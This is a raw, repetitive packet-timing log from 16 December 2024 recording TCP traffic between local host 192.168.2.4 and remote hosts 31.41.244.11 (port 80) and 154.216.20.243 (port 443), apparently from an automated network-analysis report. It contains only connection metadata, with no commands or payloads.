                                                                                                                                                                                              Dec 16, 2024 01:01:44.639079094 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.639121056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.640243053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.640260935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.640295982 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.640311956 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.641349077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.641391039 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.641438007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.641478062 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.642555952 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.642597914 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.642755985 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.642796040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.643810034 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.643829107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.643851042 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.643867016 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.644871950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.644912004 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.644958973 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.644998074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.646106958 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.646148920 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.646213055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.646250963 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.647253036 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.647299051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.647350073 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.647392988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.648433924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.648475885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.648933887 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.648974895 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.649624109 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.649676085 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.649722099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.649760962 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.650826931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.650866985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.651063919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.651106119 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.652003050 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.652045965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.652153015 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.652192116 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.653182030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.653222084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.653297901 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.653337002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.654380083 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.654419899 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.654573917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.654613018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.655638933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.655657053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.655682087 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.655698061 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.656864882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.656883001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.656908035 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.656924009 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.658008099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.658025980 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.658051014 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.658066034 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.659213066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.659230947 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.659265041 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.659280062 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.660366058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.660408020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.660430908 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.660468102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.661537886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.661580086 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.661619902 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.661659956 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.662667036 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.662719965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.662795067 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.662837982 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.663940907 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.663959026 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.663984060 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.663999081 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.665157080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.665174007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.665199995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.665215015 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.666256905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.666304111 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.666343927 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.666384935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.667413950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.667457104 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.667572021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.667628050 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.668631077 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.668684006 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.668785095 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.668823957 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.669935942 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.669953108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.669977903 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.670049906 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.671217918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.671257019 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.671298027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.671330929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.672259092 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.672276020 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.672297001 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.672308922 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.673343897 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.673381090 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.673458099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.673499107 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.674578905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.674619913 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.674635887 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.674673080 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.675717115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.675764084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.675810099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.675849915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.677005053 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.677021980 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.677045107 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.677061081 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.678091049 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.678143978 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.678507090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.678549051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.679284096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.679327965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.679362059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.679404020 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.680491924 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.680537939 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.680665016 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.680704117 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.681724072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.681765079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.681797981 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.681838036 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.682847977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.682890892 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.682986021 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.683028936 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.684017897 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.684056997 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.684132099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.684175014 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.685225010 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.685264111 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.685339928 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.685378075 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.686456919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.686497927 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.686645985 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.686686993 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.687583923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.687648058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.687658072 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.687695980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.688781977 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.688819885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.689007998 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.689044952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.690080881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.690099001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.690120935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.690138102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.691135883 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.691174030 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.816236019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.816262007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.816287994 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.816308022 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.816734076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.816768885 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.816788912 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.816802979 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.817679882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.817720890 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.817890882 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.817929983 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.818996906 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.819036961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.825762987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.825787067 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.825800896 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.825824022 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.826400042 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.826446056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.826447964 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.826484919 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.827524900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.827569962 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.827637911 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.827676058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.828690052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.828732967 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.828984976 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.829024076 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.829116106 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.829164028 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.830244064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.830290079 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.830323935 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.830363035 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.831368923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.831407070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.831480026 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.831517935 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.832565069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.832603931 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.832694054 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.832734108 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.833806038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.833823919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.833848000 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.833863974 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.834979057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.835019112 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.835098982 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.835136890 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.836271048 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.836312056 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.836360931 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.836405993 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.836541891 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:44.837306023 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.837351084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.837397099 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.837433100 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.838490963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.838536024 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.838717937 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.838756084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.839669943 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.839709044 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.839780092 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.839817047 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.840892076 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.840931892 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.841061115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.841099977 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.842080116 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.842119932 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.842159986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.842197895 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.843271017 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.843310118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.843362093 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.843405962 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.844456911 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.844496965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.844573975 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.844610929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.845613956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.845657110 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.845738888 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.845777035 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.846843004 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.846889973 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.847024918 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.847067118 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.847995043 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.848033905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.848109007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.848148108 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.849280119 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.849297047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.849334002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.850416899 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.850435019 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.850460052 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.850475073 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.851546049 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.851584911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.851655006 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.851692915 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.852794886 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.852834940 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.852880001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.852919102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.854001045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.854037046 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.854048014 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.854087114 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:44.855127096 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:44.855166912 CET4984880192.168.2.431.41.244.11
